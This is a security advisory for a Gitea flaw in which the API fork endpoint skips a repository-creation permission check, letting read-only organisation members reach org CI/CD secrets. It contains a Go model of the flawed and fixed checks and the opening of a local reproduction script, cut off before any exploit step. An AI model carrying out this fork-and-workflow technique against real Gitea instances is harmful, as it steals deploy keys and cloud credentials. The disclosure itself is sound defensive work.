CVE-2026-22555
published 2026-06-17


Severity: high
Gitea: API Fork Missing CanCreateOrgRepo Check Allows Org Secret Exfiltration

## Summary

The API endpoint `POST /api/v1/repos/{owner}/{repo}/forks` only checks `IsOrgMember()` when a user forks a repository into an organization, but does not check `CanCreateOrgRepo()`. The web UI fork handler correctly checks both. This allows a read-only organization member — in a team with `can_create_org_repo=false` — to create repositories in the organization namespace via the API. The attacker receives full admin permissions on the forked repository, can enable Actions, push arbitrary workflow files, and exfiltrate all organization-level CI/CD secrets (deploy keys, cloud credentials, API tokens) through the runner infrastructure.
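The authorization gap described above can be shown with a small model of the two checks. The following Go program is an added illustration, not Gitea's code: `Org`, `Team`, `IsOrgMember`, `CanCreateOrgRepo` and the two `AuthorizeFork*` functions are hypothetical, simplified stand-ins for the checks the advisory names. It contrasts the membership-only decision of the vulnerable API handler with the fixed decision that also requires a team with `can_create_org_repo=true`, using a constructed organisation with a read-only team and a developer team.

```go
package main

import (
	"errors"
	"fmt"
)

// Simplified, hypothetical model of an organisation's teams. This is added
// illustration, not Gitea's own types or code.
type Team struct {
	Name             string
	Members          map[string]bool
	CanCreateOrgRepo bool // the team's can_create_org_repo setting
}

type Org struct {
	Name  string
	Teams []Team
}

// IsOrgMember: the user belongs to at least one team of the organisation.
// This is the only condition the vulnerable API handler checked.
func (o *Org) IsOrgMember(user string) bool {
	for _, t := range o.Teams {
		if t.Members[user] {
			return true
		}
	}
	return false
}

// CanCreateOrgRepo: the user belongs to at least one team that is allowed to
// create repositories in the organisation namespace.
func (o *Org) CanCreateOrgRepo(user string) bool {
	for _, t := range o.Teams {
		if t.Members[user] && t.CanCreateOrgRepo {
			return true
		}
	}
	return false
}

var ErrForbidden = errors.New("forbidden: user may not create repositories in this organization")

// AuthorizeForkVulnerable mirrors the incomplete check described in the
// advisory: organisation membership alone is enough to fork into the org.
func AuthorizeForkVulnerable(o *Org, user string) error {
	if !o.IsOrgMember(user) {
		return ErrForbidden
	}
	return nil
}

// AuthorizeForkFixed requires both conditions, as the web UI handler does:
// a member of a can_create_org_repo=false team is refused.
func AuthorizeForkFixed(o *Org, user string) error {
	if !o.IsOrgMember(user) {
		return ErrForbidden
	}
	if !o.CanCreateOrgRepo(user) {
		return ErrForbidden
	}
	return nil
}

// SampleOrg builds a constructed organisation with one read-only team and
// one team that may create repositories (sample data, not from the advisory).
func SampleOrg() *Org {
	return &Org{
		Name: "acme",
		Teams: []Team{
			{Name: "readers", Members: map[string]bool{"reader": true}, CanCreateOrgRepo: false},
			{Name: "developers", Members: map[string]bool{"dev": true}, CanCreateOrgRepo: true},
		},
	}
}

func main() {
	org := SampleOrg()
	for _, user := range []string{"reader", "dev", "outsider"} {
		fmt.Printf("%-8s vulnerable=%v fixed=%v\n", user,
			AuthorizeForkVulnerable(org, user) == nil,
			AuthorizeForkFixed(org, user) == nil)
	}
}
```

Running it prints that `reader` is accepted by the membership-only check but refused by the combined check, while `dev` passes both and `outsider` passes neither. The point for reviewers of similar code is that every server-side path that creates a resource in a namespace (API and web UI alike) must apply the same complete permission check, not just the membership test.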

## Steps To Reproduce

### 1. Environment setup

Start a Gitea instance with Actions enabled:

```bash
# docker-compose.yml
cat > docker-compose.yml << 'EOF'
version: '3'
services:
  gitea:
    image: gitea/gitea:1.23
    container_name: gitea-poc
    ports:
      - "3000:3000"
    volumes:
      - gitea-data:/data
    environment:
      - GITEA__database__DB_TYPE=sqlite3
      - GITEA__server__ROOT_URL=http://localhost:3000/
      - GITEA__security__INSTALL_LOCK=true
      - GITEA__actions__ENABLED=true
volumes:
  gitea-data:
EOF

docker compose up -d
# Wait for startup
sleep 15

# Create admin user
docker exec -u git gitea-poc gitea admin user create \
  --admin --username admin --password 'Admin1234!' \
  --email [email protected] --must-change-password=false
```

### 2. Create the target environment (as admin)

```bash
# Get admin token
ADMIN_TOKEN=$(curl -s -X POST "http://localhost:3000/api/v1/users/admin/tokens" \
  -u "admin:Admin1234!" -H "Content-Type: application/json" \
  -d '{"name": "setup", "scopes": ["all"]}' | python3 -c "import sys,json; print(json.load(sys.stdin)['sha1'])")

# Create attacker user
curl -s -X POST "http://localhost:3000/api/v1/admin/users" \
  -H "Authorization: token $ADMIN_TOKEN" -H "Content-Type: application/json" \
  -d '{"username":"attacker","password":"Attacker123!","email":"att
```

## Affected

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| code.gitea.io | gitea | >= 0, < 1.26.0 | 1.26.0 |